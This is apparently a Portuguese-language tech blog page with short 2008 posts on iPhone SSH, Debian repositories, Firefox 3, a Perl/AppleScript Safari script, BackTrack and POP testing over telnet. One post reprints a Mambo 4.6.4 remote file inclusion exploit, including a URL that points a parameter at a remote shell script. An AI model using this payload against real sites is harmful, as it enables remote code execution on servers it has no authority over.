Controlando seu Iphone remotamente com o OpenSSH.

Neste tutorial irei mostrar um recurso interessante disponivél para o Iphone, o gerenciamento remoto através do OpenSSH. Com este recurso podemos controlar um Iphone remotamente executando aplicativos, reiniciando ou até mesmo desligando seu Iphone remotamente. Um outro recurso bem importante é a transferência de arquivos entre o Iphone e seu computador.
Neste pequeno tutorial irei mostrar como utilizar estes recursos de forma simples e rápida. Continue reading

Posted in Sem categoria

Repositório para APT Debian Volatile

O repositório Debian Volatie consiste em um repositório de pacotes que estão em período de maturidade que ainda não foram considerados pacotes stable, lá você pode encontrar as versões mais rescentes da vasta gama de pacotes para o Debian.

Sarge:
deb http://volatile.debian.org/debian-volatile sarge/volatile main contrib non-free

Etch:
deb http://volatile.debian.org/debian-volatile etch/volatile main contrib non-free

Posted in Sem categoria

Download Day. Firefox 3 bate recorde de download em sua estréia

O site http://www.spreadfirefox.com/pt-BR/worldrecord, mostra a quantidade de downloads do navegador Firefox 3.0 na sua estréia até o momento que escrevi este post tinha 9 milhoões de downloads. Oque podemos perceber também é que o brasileiro ainda não percebeu a grande diferença entre o Firefox e seu suposto concorrent o IE.

Vamos lá pessoal, Firefox é muito mais seguro e possui vários Addons interessantes, e outro detalhe importante é que foi comprovado pela faculdade de Cambridge que o Firefox 3 renderiza as páginas mais rápido que o IE 7.

Posted in Sem categoria

Script Perl para abrir uma janela do browser padrão no OS X

O script Perl abaixo têm como principal função abrir uma janela do Safari do OS X através do shell, uma das possibilidades é enviar um comando por exemplo de um Iphone para controlar o navegador da máquina desktop.

#!/usr/bin/perl -w
use strict;
sub runAppleScript($)
{
my ($ascript) = @_;

my $result = `/usr/bin/osascript<<" EOT" $ascript EOT `; chomp($result); return $result; }# newSafariWindowWithUrl: Opens a new Safari window with the given URL sub newSafariWindowWithUrl($) { my ($url) = @_;runAppleScript(qq(tell application "Safari" activate make new document at end of documents set URL of document 1 to "$url" end tell)); }# newSafariTabWithUrl: Opens a new Safari tab with the given URL sub newSafariTabWithUrl($) { my ($url) = @_;runAppleScript(qq(-- bring Safari to the front tell application "Safari" activate end-- check that GUI Scripting has been enabled tell application "System Events" if UI elements enabled is false then tell application "Safari" make new document at end of documents set URL of document 1 to "http://www.apple.com/applescript/uiscripting/01.html" end tell set message to "You need to enable Assistive Devices as explained on this web page" display dialog message buttons {"OK"} return end if end tell-- create the new tab tell application "System Events" tell process "Safari" click menu item "New Tab" of menu "File" of menu bar 1 end tell end tell-- set the new tab to show the given URL tell application "Safari" set URL of document 1 to "$url" end tell)); }# -- MAIN --my $topic = ""; if (@ARGV >= 1)
{
$topic = $ARGV[0];
}

# Uncomment whichever of the two functions you want to use:
#newSafariTabWithUrl(“man:$topic”);
newSafariWindowWithUrl(“man:$topic”);

Posted in Sem categoria

Iphone 3G

Como era de se esperar o Iphone 3G chegará as prateleiras de todo o mundo agora no segundo semestre de 2008, a boa nova é que o Brasil está incluso na estratégia da Apple para o lançamento do novo smartphone que se diz ser a revolução da telefonia.
O preço dele nos USA sairá por US$ 199,00 ( incrivél não  ? ) e ainda havia rumores que ele chegaria ao Brasil por R$ 500,00, mas não fique tão instusiasmado pois é pura especulação.

Abaixo você encontra algumas imagens do Iphone 3G e suas sutis melhorias no design de hardware e mudanças no software.

Iphone 3G – Ad Hallway

Lançamento – WWDC 09/06/2008 ( Apresentado por Steve Jobs )

Se você procura um smartphone, funcional, elegante e com uma quantidade consideravél de aplicações o Iphone é uma ótima opção, mas lembre-se serviços de comunicação com tecnologia 3G no Brasil ainda são bem caras, se estiver disposto a investir um dinheiro consideravél para utilização do serviço compre o Iphone 3G ele realmente vale a pena.

Posted in Sem categoria

Exploit Mambo 4.6.4 ( Remote File Inclusion Vulnerability )

Foi publicado rescentemente no site packetstormsecurity.com um exploit para o Mambo 4.6.4 no qual habilita a execução remota de comandos, o código e exemplo de utilização estão abaixo:

.-----------------------------------------------------------------------------.
|  vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability                  |
|  download: http://mambo-foundation.org/                                     |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: all friends  ;)                                                   |
'-----------------------------------------------------------------------------'

# code:

/includes/Cache/Lite/Output.php :
1     <?php
2
3     /**
4     * This class extends Cache_Lite and uses output buffering to get the data to cache.
5     *
6     * There are some examples in the 'docs/examples' file
7     * Technical choices are described in the 'docs/technical' file
8     *
9     * @package Cache_Lite
10     * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11     * @author Fabien MARTY <fab@php.net>
12     */
13
14     require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...

^ no comment.. RFI in line 14..

# exploit:

http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
Posted in Sem categoria

BackTrack e outras distribuições optimizadas para segurança

A distribuição BackTrack é uma customização do Slax com ferramentas de análise forense e auditoria de sistemas.

Para saber mais acesse o link: http://www.remote-exploit.org/backtrack.html

Abaixo você poderá conferir um video mostrando uma técnica de crack de uma rede wireless com airsnort utilizando as ferramentas do BackTrack:

Você poderá conferir outras distribuições Linux com foco em segurança na URL http://securitydistro.com/security-distros/

Posted in Sem categoria

Lendo e-mail pelo comando telnet

Esta dica server para aqueles usuários que precisam testar servidores POP de forma rápida, para isso você pode utilizar o comando telnet apontando para o servidor POP.

Siga o exemplo
Em nosso exemplo o servidor POP é o mail.nossoserver.com.br e está configurado na porta 110.

Abra um terminal e entre com o comando:
telnet mail.nossoserver.com.br 110
USER  nome-do-usuario
PASS sua-senha
LIST
RETR 1

Explicando:
– Na primeira linha apontamos o telnet para o servidor mail.nossoserver.com.br 110;
– USER: especificamos o usuário que têm acesso a conta d e-mail;
– PASS: senha do usuário que têm acesso ao e-mail;
– LIST: gera uma lista dos e-mails que estão na caixa do servidor;
– RETR 1: Exibe o e-mail 1 da lista de e-mails;

Outras opções importantes:
DELE 1: Deleta o e-mail número 1;
quit: fecha a sessão.

 

 

 

Posted in Sem categoria

Screenshot de seu website via WEB.

O website superscreenshot.com realmente faz juz ao nome super… nele você consegue tirar um screenshot full de seu website sem ao menos ter que instalar o software em sua máquina.

Vale a pena guardar este enderço: http://www.superscreenshot.com

Posted in Sem categoria